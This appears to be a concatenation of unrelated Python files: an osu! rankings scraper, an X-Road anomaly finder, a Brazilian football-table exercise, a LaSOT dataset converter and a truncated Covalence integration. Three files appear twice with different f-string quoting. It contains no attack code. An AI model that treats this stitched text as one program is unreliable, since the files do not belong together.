time.sleep(breakTime * 3 + random.random()) return getPage(country, index, breakTime, datas, startTime) def userData(pageData, index=0): needs = ('rank','acc','pc','pp','ss','s','a') number = re.compile(r'\d+\.?\d*') se = pageData[index].find_all('td', attrs={'class': 'ranking-page-table__column'}) user = se.pop(1).find('a', attrs={'class': 'ranking-page-table__user-link-text js-usercard'}) userid = user.attrs.get('data-user-id') username = user.text.strip() data = { k: number.findall(se[i].text.replace(',',''))[0] for i, k in enumerate(needs) } data['username'], data['userid'] = username, userid if 'ranking-page-table__row--inactive' in pageData[index].attrs['class']: data['status'] = 'inactive' else: data['status'] = 'active' return data def fetchData(startPage=1, endPage=1, country='CN'): from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED data = [] print(f'[{getTime(1)}]:开始工作,抓取行政区:[{country}];起始页:{startPage},结束页:{endPage}\n') #for idx in range(startPage, endPage+1): # thisPage = getPage(country, index=idx) # userDatas = [userData(thisPage, index=i) for i in range(len(thisPage))] # data.append({'country': country, 'page': idx, 'data': userDatas, 'time': getTime(1)}) def getDone(f): thisPage = f.result() userDatas = [userData(thisPage, index=i) for i in range(len(thisPage))] data.append({'country': country, 'page': idx, 'data': userDatas, 'time': getTime(1)}) print(f'\r当前任务已完成({len(data)}/{endPage-startPage+1})', end='') with ThreadPoolExecutor(max_workers=16) as executor: tasks = [] for idx in range(startPage, endPage + 1): ft = executor.submit(getPage, country, index=idx) ft.add_done_callback(getDone) tasks.append(ft) wait(tasks, return_when=ALL_COMPLETED) return {'data': data, 'country': country, 'time': getTime(1)} # country: # '' == global ranking; # 'CN', 'US, 'UK' ... == country ranking def getRankings(country=''): startPage=60 endPage=100 sstart = time.time() print(f'开始排行榜!起始:{startPage},终止:{endPage},地区:{country}') data = fetchData(startPage=startPage, endPage=endPage, country=country) print('完毕。') return data if __name__ == '__main__': # go data = getRankings() # fix data print('开始处理玩家...') players = [] for page in data['data']: for player in page['data']: players.append(player) #print(player['userid']) print('完毕,全部玩家:', len(players)) # request local api to get player data, and calculate cost print('开工...') tries = 0 for p in players: try: tries += 1 print(f'[{tries}] do -> ',p['userid']) dstart = time.time() r = requests.get('http://127.0.0.1:8989/player/{}'.format(p['userid']), timeout=120) d = r.json() ddone = time.time() - dstart if d.get('status') == 0: print(f'[{tries}] sb(0) -> ', p['userid'], f' ({ddone})s') players.append(p) print(f'[{tries}] done -> ',p['userid'], f' ({ddone})s') except: ddone = time.time() - dstart print(f'[{tries}] sb(1) -> ', p['userid'], f' ({ddone})s') players.append(p) print('任务完成,总用时:', time.time() - sstart, 's')
# The MIT License # Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS) # Copyright (c) 2017-2020 Estonian Information System Authority (RIA) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import traceback from opmon_analyzer.analyzer_conf import DataModelConfiguration from .AnalyzerDatabaseManager import AnalyzerDatabaseManager from .models.FailedRequestRatioModel import FailedRequestRatioModel from .models.DuplicateMessageIdModel import DuplicateMessageIdModel from .models.TimeSyncModel import TimeSyncModel from .models.AveragesByTimeperiodModel import AveragesByTimeperiodModel from . import constants from .logger_manager import LoggerManager from . import __version__ import time import datetime import numpy as np def find_anomalies_main(settings): logger_m = LoggerManager(settings['logger'], settings['xroad']['instance'], __version__) try: db_manager = AnalyzerDatabaseManager(settings) logger_m.log_info('_tmp_find_anomalies_start', "Process started ...") find_anomalies(settings, db_manager, logger_m) except Exception: logger_m.log_error("find_anomalies_main", traceback.format_exc()) def find_anomalies(settings, db_manager, logger_m): current_time = datetime.datetime.now() n_anomalies = 0 config = DataModelConfiguration(settings) # add first request timestamps for service calls that have appeared logger_m.log_info('_tmp_find_anomalies_1', "Add first request timestamps for service calls that have appeared ...") logger_m.log_heartbeat("Checking if completely new service calls have appeared", 'SUCCEEDED') db_manager.add_first_request_timestamps_from_clean_data() logger_m.log_info('_tmp_find_anomalies_1', "Add first request timestamps ... Done!") logger_m.log_info('_tmp_find_anomalies_2', "Anomaly types 4.3.1-4.3.3 ...") for model_type, time_window in config.time_windows.items(): logger_m.log_info('_tmp_find_anomalies_2', f"Finding {model_type} anomalies, aggregating by {time_window}...") logger_m.log_heartbeat(f"Finding {model_type} anomalies, aggregating by {time_window}", 'SUCCEEDED') start = time.time() last_transform_date = db_manager.get_timestamp(ts_type="last_transform_timestamp", model_type=model_type) if last_transform_date is not None: last_transform_timestamp = last_transform_date.timestamp() * 1000 else: last_transform_timestamp = None buffer_time = settings['analyzer']['corrector-buffer-time'] current_transform_date = current_time - datetime.timedelta(minutes=buffer_time) residual = current_transform_date.timestamp() % (60 * time_window["agg_minutes"]) current_transform_timestamp = (current_transform_date.timestamp() - residual) * 1000 if model_type == "failed_request_ratio": model = FailedRequestRatioModel(settings) data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"]) anomalies = model.transform(data, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies = len(anomalies) elif model_type == "duplicate_message_ids": model = DuplicateMessageIdModel() data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"]) anomalies = model.transform(data, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies = len(anomalies) elif model_type == "time_sync_errors": model = TimeSyncModel() n_anomalies = 0 for metric, threshold in config.time_sync_monitored_lower_thresholds.items(): start = time.time() data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"], metric=metric, threshold=threshold) anomalies = model.transform(data, metric, threshold, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies += len(anomalies) t0 = np.round(time.time() - start, 2) logger_m.log_info('find_anomalies', f"{model_type} anomalies time: {t0} seconds.") if last_transform_date is not None: logger_m.log_info('find_anomalies', f"Used data between {last_transform_date} and {current_transform_date}.") else: logger_m.log_info('find_anomalies', f"Used data until {current_transform_date}") logger_m.log_info('find_anomalies', f"Found {n_anomalies} anomalies.") db_manager.set_timestamp(ts_type="last_transform_timestamp", model_type=model_type, value=datetime.datetime.fromtimestamp(current_transform_timestamp / 1000.0)) logger_m.log_info('_tmp_find_anomalies_2', "Anomaly types 4.3.1-4.3.3 ... Done!") logger_m.log_info('_tmp_find_anomalies_3', "Anomaly types 4.3.5 - 4.3.9. Comparison with historic averages ...") logger_m.log_heartbeat("Determining service call stages", 'SUCCEEDED') sc_regular, sc_first_incidents = db_manager.get_service_calls_for_transform_stages() logger_m.log_info( 'find_anomalies', f"No. service calls that have passed the training period for the first time: {len(sc_first_incidents)}" ) logger_m.log_info('find_anomalies', f"Number of service calls in regular mode: {len(sc_regular)}") for time_window, _ in config.historic_averages_time_windows: last_transform_date = db_manager.get_timestamp(ts_type="last_transform_timestamp", model_type=time_window['timeunit_name']) logger_m.log_info('_tmp_find_anomalies_3', f"Model type: {time_window["timeunit_name"]}") if last_transform_date is not None: last_transform_timestamp = last_transform_date.timestamp() * 1000 else: last_transform_timestamp = None buffer_time = settings['analyzer']['corrector-buffer-time'] current_transform_date = current_time - datetime.timedelta(minutes=buffer_time) residual = current_transform_date.timestamp() % (60 * time_window["agg_window"]["agg_minutes"]) current_transform_timestamp = (current_transform_date.timestamp() - residual) * 1000 start = time.time() logger_m.log_info('_tmp_find_anomalies_3', f"Reading data and aggregating (model {time_window["timeunit_name"]})") logger_m.log_heartbeat("Reading data and aggregating (model {time_window['timeunit_name']})", 'SUCCEEDED') data = db_manager.get_data_for_transform_stages( time_window["agg_window"]["agg_minutes"], last_transform_timestamp, current_transform_timestamp, sc_regular, sc_first_incidents ) if len(data) > 0: logger_m.log_info('_tmp_find_anomalies_3', "Loading the %s model" % time_window['timeunit_name']) logger_m.log_heartbeat("Loading the %s model" % time_window['timeunit_name'], 'SUCCEEDED') dt_model = db_manager.load_model(model_name=time_window['timeunit_name'], version=None) dt_model = dt_model.groupby(constants.service_identifier_column_names + ["similar_periods"]).first() averages_by_time_period_model = AveragesByTimeperiodModel(time_window, config, dt_model) logger_m.log_info('_tmp_find_anomalies_3', "Finding anomalies (model %s)" % time_window['timeunit_name']) logger_m.log_heartbeat("Finding anomalies (model %s)" % time_window['timeunit_name'], 'SUCCEEDED') anomalies = averages_by_time_period_model.transform(data) t0 = np.round(time.time() - start, 2) logger_m.log_info( 'find_anomalies', f"Averages by timeperiod ({time_window["timeunit_name"]}) anomaly finding time: {t0} seconds." ) logger_m.log_info('find_anomalies', f"Used data between {last_transform_date} and {current_transform_date}.") logger_m.log_info('find_anomalies', f"Found {len(anomalies)} anomalies.") if len(anomalies) > 0: db_manager.insert_incidents(anomalies) logger_m.log_info('_tmp_find_anomalies_3', f"Updating last anomaly finding timestamp (model {time_window["timeunit_name"]})") logger_m.log_heartbeat(f"Updating last anomaly finding timestamp (model {time_window["timeunit_name"]})", 'SUCCEEDED') db_manager.set_timestamp(ts_type="last_transform_timestamp", model_type=time_window['timeunit_name'], value=datetime.datetime.fromtimestamp(current_transform_timestamp / 1000.0)) logger_m.log_info('_tmp_find_anomalies_3', "Anomaly types 4.3.5 - 4.3.9. Comparison with historic averages ... Done!") logger_m.log_info('_tmp_find_anomalies_4', "Incident timestamps ...") if len(sc_first_incidents) > 0: logger_m.log_heartbeat("Updating first incident timestamps", 'SUCCEEDED') db_manager.update_first_timestamps(field="first_incident_timestamp", value=current_time, service_calls=sc_first_incidents[constants.service_identifier_column_names]) logger_m.log_info('_tmp_find_anomalies_4', "Incident timestamps ... Done!") logger_m.log_info('_tmp_find_anomalies_end', "Process finished ... Done!")
# The MIT License # Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS) # Copyright (c) 2017-2020 Estonian Information System Authority (RIA) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import traceback from opmon_analyzer.analyzer_conf import DataModelConfiguration from .AnalyzerDatabaseManager import AnalyzerDatabaseManager from .models.FailedRequestRatioModel import FailedRequestRatioModel from .models.DuplicateMessageIdModel import DuplicateMessageIdModel from .models.TimeSyncModel import TimeSyncModel from .models.AveragesByTimeperiodModel import AveragesByTimeperiodModel from . import constants from .logger_manager import LoggerManager from . import __version__ import time import datetime import numpy as np def find_anomalies_main(settings): logger_m = LoggerManager(settings['logger'], settings['xroad']['instance'], __version__) try: db_manager = AnalyzerDatabaseManager(settings) logger_m.log_info('_tmp_find_anomalies_start', "Process started ...") find_anomalies(settings, db_manager, logger_m) except Exception: logger_m.log_error("find_anomalies_main", traceback.format_exc()) def find_anomalies(settings, db_manager, logger_m): current_time = datetime.datetime.now() n_anomalies = 0 config = DataModelConfiguration(settings) # add first request timestamps for service calls that have appeared logger_m.log_info('_tmp_find_anomalies_1', "Add first request timestamps for service calls that have appeared ...") logger_m.log_heartbeat("Checking if completely new service calls have appeared", 'SUCCEEDED') db_manager.add_first_request_timestamps_from_clean_data() logger_m.log_info('_tmp_find_anomalies_1', "Add first request timestamps ... Done!") logger_m.log_info('_tmp_find_anomalies_2', "Anomaly types 4.3.1-4.3.3 ...") for model_type, time_window in config.time_windows.items(): logger_m.log_info('_tmp_find_anomalies_2', f"Finding {model_type} anomalies, aggregating by {time_window}...") logger_m.log_heartbeat(f"Finding {model_type} anomalies, aggregating by {time_window}", 'SUCCEEDED') start = time.time() last_transform_date = db_manager.get_timestamp(ts_type="last_transform_timestamp", model_type=model_type) if last_transform_date is not None: last_transform_timestamp = last_transform_date.timestamp() * 1000 else: last_transform_timestamp = None buffer_time = settings['analyzer']['corrector-buffer-time'] current_transform_date = current_time - datetime.timedelta(minutes=buffer_time) residual = current_transform_date.timestamp() % (60 * time_window["agg_minutes"]) current_transform_timestamp = (current_transform_date.timestamp() - residual) * 1000 if model_type == "failed_request_ratio": model = FailedRequestRatioModel(settings) data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"]) anomalies = model.transform(data, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies = len(anomalies) elif model_type == "duplicate_message_ids": model = DuplicateMessageIdModel() data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"]) anomalies = model.transform(data, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies = len(anomalies) elif model_type == "time_sync_errors": model = TimeSyncModel() n_anomalies = 0 for metric, threshold in config.time_sync_monitored_lower_thresholds.items(): start = time.time() data = db_manager.aggregate_data(model_type=model_type, start_time=last_transform_timestamp, end_time=current_transform_timestamp, agg_minutes=time_window["agg_minutes"], metric=metric, threshold=threshold) anomalies = model.transform(data, metric, threshold, time_window) if len(anomalies) > 0: db_manager.insert_incidents(anomalies) n_anomalies += len(anomalies) t0 = np.round(time.time() - start, 2) logger_m.log_info('find_anomalies', f"{model_type} anomalies time: {t0} seconds.") if last_transform_date is not None: logger_m.log_info('find_anomalies', f"Used data between {last_transform_date} and {current_transform_date}.") else: logger_m.log_info('find_anomalies', f"Used data until {current_transform_date}") logger_m.log_info('find_anomalies', f"Found {n_anomalies} anomalies.") db_manager.set_timestamp(ts_type="last_transform_timestamp", model_type=model_type, value=datetime.datetime.fromtimestamp(current_transform_timestamp / 1000.0)) logger_m.log_info('_tmp_find_anomalies_2', "Anomaly types 4.3.1-4.3.3 ... Done!") logger_m.log_info('_tmp_find_anomalies_3', "Anomaly types 4.3.5 - 4.3.9. Comparison with historic averages ...") logger_m.log_heartbeat("Determining service call stages", 'SUCCEEDED') sc_regular, sc_first_incidents = db_manager.get_service_calls_for_transform_stages() logger_m.log_info( 'find_anomalies', f"No. service calls that have passed the training period for the first time: {len(sc_first_incidents)}" ) logger_m.log_info('find_anomalies', f"Number of service calls in regular mode: {len(sc_regular)}") for time_window, _ in config.historic_averages_time_windows: last_transform_date = db_manager.get_timestamp(ts_type="last_transform_timestamp", model_type=time_window['timeunit_name']) logger_m.log_info('_tmp_find_anomalies_3', f"Model type: {time_window['timeunit_name']}") if last_transform_date is not None: last_transform_timestamp = last_transform_date.timestamp() * 1000 else: last_transform_timestamp = None buffer_time = settings['analyzer']['corrector-buffer-time'] current_transform_date = current_time - datetime.timedelta(minutes=buffer_time) residual = current_transform_date.timestamp() % (60 * time_window["agg_window"]["agg_minutes"]) current_transform_timestamp = (current_transform_date.timestamp() - residual) * 1000 start = time.time() logger_m.log_info('_tmp_find_anomalies_3', f"Reading data and aggregating (model {time_window['timeunit_name']})") logger_m.log_heartbeat("Reading data and aggregating (model {time_window['timeunit_name']})", 'SUCCEEDED') data = db_manager.get_data_for_transform_stages( time_window["agg_window"]["agg_minutes"], last_transform_timestamp, current_transform_timestamp, sc_regular, sc_first_incidents ) if len(data) > 0: logger_m.log_info('_tmp_find_anomalies_3', "Loading the %s model" % time_window['timeunit_name']) logger_m.log_heartbeat("Loading the %s model" % time_window['timeunit_name'], 'SUCCEEDED') dt_model = db_manager.load_model(model_name=time_window['timeunit_name'], version=None) dt_model = dt_model.groupby(constants.service_identifier_column_names + ["similar_periods"]).first() averages_by_time_period_model = AveragesByTimeperiodModel(time_window, config, dt_model) logger_m.log_info('_tmp_find_anomalies_3', "Finding anomalies (model %s)" % time_window['timeunit_name']) logger_m.log_heartbeat("Finding anomalies (model %s)" % time_window['timeunit_name'], 'SUCCEEDED') anomalies = averages_by_time_period_model.transform(data) t0 = np.round(time.time() - start, 2) logger_m.log_info( 'find_anomalies', f"Averages by timeperiod ({time_window['timeunit_name']}) anomaly finding time: {t0} seconds." ) logger_m.log_info('find_anomalies', f"Used data between {last_transform_date} and {current_transform_date}.") logger_m.log_info('find_anomalies', f"Found {len(anomalies)} anomalies.") if len(anomalies) > 0: db_manager.insert_incidents(anomalies) logger_m.log_info('_tmp_find_anomalies_3', f"Updating last anomaly finding timestamp (model {time_window['timeunit_name']})") logger_m.log_heartbeat(f"Updating last anomaly finding timestamp (model {time_window['timeunit_name']})", 'SUCCEEDED') db_manager.set_timestamp(ts_type="last_transform_timestamp", model_type=time_window['timeunit_name'], value=datetime.datetime.fromtimestamp(current_transform_timestamp / 1000.0)) logger_m.log_info('_tmp_find_anomalies_3', "Anomaly types 4.3.5 - 4.3.9. Comparison with historic averages ... Done!") logger_m.log_info('_tmp_find_anomalies_4', "Incident timestamps ...") if len(sc_first_incidents) > 0: logger_m.log_heartbeat("Updating first incident timestamps", 'SUCCEEDED') db_manager.update_first_timestamps(field="first_incident_timestamp", value=current_time, service_calls=sc_first_incidents[constants.service_identifier_column_names]) logger_m.log_info('_tmp_find_anomalies_4', "Incident timestamps ... Done!") logger_m.log_info('_tmp_find_anomalies_end', "Process finished ... Done!")
# Ex073 tabela = ('Flamengo', 'Internacional', 'Atlético', 'São Paulo', 'Fluminense', 'Grêmio', 'Palmeiras', 'Santos', 'Atlético Paranaense', 'Red Bull Bragantino', 'Ceará', 'Conrinthians', 'Atlético GO', 'Bahia', 'Sport', 'Fortaleza', 'Vasco da Gama', 'Goias', 'Coritiba', 'Botafogo') cont = 0 while True: print(f'\033[m\033[7m{'BRASILEIRÃO 2021':^55}\033[m') print("""\033[7m[1]\033[m - Mostra todos os times na ordem da tabela \033[7m[2]\033[m - Mostra o G5 do Brasilerão \033[7m[3]\033[m - Mostra a zona de rebaixamento do Brasileirão \033[7m[4]\033[m - Mostra todos os times em ordem alfabética \033[7m[5]\033[m - Mostra a posição do Grêmio na tabela \033[7m[6]\033[m - Encerrar programa""") print(f'\033[m\033[7m{' ':^55}\033[m') choice = int(input('Escolha o que deseja mostrar: ')) if choice == 1: cont = 0 for times in tabela: cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{times}') print('\033[m', end='') elif choice == 2: cont = 0 for times in range(0, 5): cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{tabela[cont - 1]}') print('\033[m', end='') elif choice == 3: cont = 17 for times in range(0, 4): if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{tabela[cont - 1]}') cont += 1 print('\033[m', end='') elif choice == 4: cont = 0 for times in sorted(tabela): cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{times}') print('\033[m', end='') elif choice == 5: cont = 0 for times in tabela: cont += 1 print('\033[32m', end='') if times == 'Grêmio': print(f'{cont}°-{times}\033[m') elif choice == 6: break else: print(f'\033[7;31m{'COMANDO INVÁLIDO, TENTE NOVAMENTE':^55}\033[m')
# Ex073 tabela = ('Flamengo', 'Internacional', 'Atlético', 'São Paulo', 'Fluminense', 'Grêmio', 'Palmeiras', 'Santos', 'Atlético Paranaense', 'Red Bull Bragantino', 'Ceará', 'Conrinthians', 'Atlético GO', 'Bahia', 'Sport', 'Fortaleza', 'Vasco da Gama', 'Goias', 'Coritiba', 'Botafogo') cont = 0 while True: print(f'\033[m\033[7m{"BRASILEIRÃO 2021":^55}\033[m') print("""\033[7m[1]\033[m - Mostra todos os times na ordem da tabela \033[7m[2]\033[m - Mostra o G5 do Brasilerão \033[7m[3]\033[m - Mostra a zona de rebaixamento do Brasileirão \033[7m[4]\033[m - Mostra todos os times em ordem alfabética \033[7m[5]\033[m - Mostra a posição do Grêmio na tabela \033[7m[6]\033[m - Encerrar programa""") print(f'\033[m\033[7m{" ":^55}\033[m') choice = int(input('Escolha o que deseja mostrar: ')) if choice == 1: cont = 0 for times in tabela: cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{times}') print('\033[m', end='') elif choice == 2: cont = 0 for times in range(0, 5): cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{tabela[cont - 1]}') print('\033[m', end='') elif choice == 3: cont = 17 for times in range(0, 4): if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{tabela[cont - 1]}') cont += 1 print('\033[m', end='') elif choice == 4: cont = 0 for times in sorted(tabela): cont += 1 if cont % 2 == 0: print('\033[31m', end='') else: print('\033[32m', end='') print(f'{cont}°-{times}') print('\033[m', end='') elif choice == 5: cont = 0 for times in tabela: cont += 1 print('\033[32m', end='') if times == 'Grêmio': print(f'{cont}°-{times}\033[m') elif choice == 6: break else: print(f'\033[7;31m{"COMANDO INVÁLIDO, TENTE NOVAMENTE":^55}\033[m')
import argparse import os.path as osp from collections import defaultdict import mmcv from tqdm import tqdm def parse_args(): parser = argparse.ArgumentParser( description='LaSOT test dataset to COCO Video format') parser.add_argument( '-i', '--input', help='root directory of LaSOT test dataset', ) parser.add_argument( '-o', '--output', help='directory to save coco formatted label file', ) return parser.parse_args() def convert_lasot_test(lasot_test, ann_dir, save_dir): """Convert lasot dataset to COCO style. Args: lasot_test (dict): The converted COCO style annotations. ann_dir (str): The path of lasot test dataset save_dir (str): The path to save `lasot_test`. """ records = dict(vid_id=1, img_id=1, ann_id=1, global_instance_id=1) videos_list = osp.join(ann_dir, 'testing_set.txt') videos_list = mmcv.list_from_file(videos_list) lasot_test['categories'] = [dict(id=0, name=0)] for video_name in tqdm(videos_list): video_path = osp.join(ann_dir, video_name) video = dict(id=records['vid_id'], name=video_name) lasot_test['videos'].append(video) gt_bboxes = mmcv.list_from_file( osp.join(video_path, 'groundtruth.txt')) full_occlusion = mmcv.list_from_file( osp.join(video_path, 'full_occlusion.txt')) full_occlusion = full_occlusion[0].split(',') out_of_view = mmcv.list_from_file( osp.join(video_path, 'out_of_view.txt')) out_of_view = out_of_view[0].split(',') img = mmcv.imread(osp.join(video_path, 'img/00000001.jpg')) height, width, _ = img.shape for frame_id, gt_bbox in enumerate(gt_bboxes): file_name = '%08d' % (frame_id + 1) + '.jpg' file_name = osp.join(video_name, 'img', file_name) image = dict( file_name=file_name, height=height, width=width, id=records['img_id'], frame_id=frame_id, video_id=records['vid_id']) lasot_test['images'].append(image) x1, y1, w, h = gt_bbox.split(',') ann = dict( id=records['ann_id'], image_id=records['img_id'], instance_id=records['global_instance_id'], category_id=0, bbox=[int(x1), int(y1), int(w), int(h)], area=int(w) * int(h), full_occlusion=full_occlusion[frame_id] == '1', out_of_view=out_of_view[frame_id] == '1') lasot_test['annotations'].append(ann) records['ann_id'] += 1 records['img_id'] += 1 records['global_instance_id'] += 1 records['vid_id'] += 1 mmcv.dump(lasot_test, osp.join(save_dir, 'lasot_test.json')) print('-----LaSOT Test Dataset------') print(f'{records['vid_id']- 1} videos') print(f'{records['global_instance_id']- 1} instances') print(f'{records['img_id']- 1} images') print(f'{records['ann_id'] - 1} objects') print('-----------------------------') def main(): args = parse_args() lasot_test = defaultdict(list) convert_lasot_test(lasot_test, args.input, args.output) if __name__ == '__main__': main()
import argparse import os.path as osp from collections import defaultdict import mmcv from tqdm import tqdm def parse_args(): parser = argparse.ArgumentParser( description='LaSOT test dataset to COCO Video format') parser.add_argument( '-i', '--input', help='root directory of LaSOT test dataset', ) parser.add_argument( '-o', '--output', help='directory to save coco formatted label file', ) return parser.parse_args() def convert_lasot_test(lasot_test, ann_dir, save_dir): """Convert lasot dataset to COCO style. Args: lasot_test (dict): The converted COCO style annotations. ann_dir (str): The path of lasot test dataset save_dir (str): The path to save `lasot_test`. """ records = dict(vid_id=1, img_id=1, ann_id=1, global_instance_id=1) videos_list = osp.join(ann_dir, 'testing_set.txt') videos_list = mmcv.list_from_file(videos_list) lasot_test['categories'] = [dict(id=0, name=0)] for video_name in tqdm(videos_list): video_path = osp.join(ann_dir, video_name) video = dict(id=records['vid_id'], name=video_name) lasot_test['videos'].append(video) gt_bboxes = mmcv.list_from_file( osp.join(video_path, 'groundtruth.txt')) full_occlusion = mmcv.list_from_file( osp.join(video_path, 'full_occlusion.txt')) full_occlusion = full_occlusion[0].split(',') out_of_view = mmcv.list_from_file( osp.join(video_path, 'out_of_view.txt')) out_of_view = out_of_view[0].split(',') img = mmcv.imread(osp.join(video_path, 'img/00000001.jpg')) height, width, _ = img.shape for frame_id, gt_bbox in enumerate(gt_bboxes): file_name = '%08d' % (frame_id + 1) + '.jpg' file_name = osp.join(video_name, 'img', file_name) image = dict( file_name=file_name, height=height, width=width, id=records['img_id'], frame_id=frame_id, video_id=records['vid_id']) lasot_test['images'].append(image) x1, y1, w, h = gt_bbox.split(',') ann = dict( id=records['ann_id'], image_id=records['img_id'], instance_id=records['global_instance_id'], category_id=0, bbox=[int(x1), int(y1), int(w), int(h)], area=int(w) * int(h), full_occlusion=full_occlusion[frame_id] == '1', out_of_view=out_of_view[frame_id] == '1') lasot_test['annotations'].append(ann) records['ann_id'] += 1 records['img_id'] += 1 records['global_instance_id'] += 1 records['vid_id'] += 1 mmcv.dump(lasot_test, osp.join(save_dir, 'lasot_test.json')) print('-----LaSOT Test Dataset------') print(f'{records["vid_id"]- 1} videos') print(f'{records["global_instance_id"]- 1} instances') print(f'{records["img_id"]- 1} images') print(f'{records["ann_id"] - 1} objects') print('-----------------------------') def main(): args = parse_args() lasot_test = defaultdict(list) convert_lasot_test(lasot_test, args.input, args.output) if __name__ == '__main__': main()
import os import requests import json import traceback import dateparser from datetime import datetime, timedelta from bs4 import BeautifulSoup from CommonServerPython import * from typing import List import demistomock as demisto DATE_FORMAT = '%Y-%m-%dT%H:%M:%S' HOST = demisto.params().get('host') BROKER = argToBoolean(demisto.params().get('broker', False)) USERNAME = demisto.params().get('credentials')['identifier'] PASSWORD = demisto.params().get('credentials')['password'] VERIFY_SSL = demisto.params().get('verify_ssl') TIMEOUT = int(demisto.params().get('timeout')) FIRST_RUN_TIME_RANGE = int(demisto.params().get('first_run_time_range').strip()) FETCH_LIMIT = int(demisto.params().get('fetch_limit')) PROXY = demisto.params().get('proxy') if not demisto.params().get('proxy', False): del os.environ['HTTP_PROXY'] del os.environ['HTTPS_PROXY'] del os.environ['http_proxy'] del os.environ['https_proxy'] def find_covs(client_name): url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) covs = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): if client_name == link.contents[0]: href = link.get('href', '') if href: covs.append(href.split('/index/', 1)[-1]) return covs def build_host(host): host = host.rstrip('/') if not host.startswith('https:') and not host.startswith('http:'): host = 'https://' + host if host.startswith('https:') and not host.endswith('/CovalenceWebUI/services'): host += '/CovalenceWebUI/services' elif not host.endswith('/services'): host += '/services' return host def login(host=HOST, cov_id=None, username=USERNAME, password=PASSWORD, verify_ssl=VERIFY_SSL): if not username: raise Exception('Username must be supplied') if not password: raise Exception('Password must be supplied') if not host: raise Exception('Host must be supplied') host = build_host(host) if not verify_ssl: # Disable the warnings if we're not verifying ssl import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() if BROKER and cov_id: url = f'https://{HOST}/index/{cov_id}' s.get(url, verify=verify_ssl) p = {'username': username, 'password': password} r = s.post(host + '/rest/login', data=p, verify=verify_ssl) if 200 != r.status_code: raise Exception("Failed to login to %s - %d" % (host, r.status_code)) if not s.cookies: raise Exception("Failed to retrieve cookie") return s def send_request(method, api_endpoint, target_org=None, host=HOST, headers=None, params=None, data=None, json=None): cov_ids = [] BROKER = argToBoolean(demisto.params().get('broker', False)) if BROKER: if target_org: cov_ids = find_covs(target_org) if not cov_ids: raise ValueError(f'Unknown organization {target_org}') else: raise ValueError('Target organization is required in broker mode') else: cov_ids.append(None) result = [] for cov_id in cov_ids: s = login(cov_id=cov_id) host = build_host(host) url = f'{host}{api_endpoint}' req = requests.Request(method, url, headers=headers, params=params, data=data, json=json) prepped = s.prepare_request(req) try: resp = s.send(prepped, stream=None, verify=VERIFY_SSL, proxies=PROXY, cert=None, timeout=TIMEOUT ) resp.raise_for_status() except Exception: return_error('Error in API call [%d] - %s' % (resp.status_code, resp.reason)) else: # when having several covs # merging each response from each 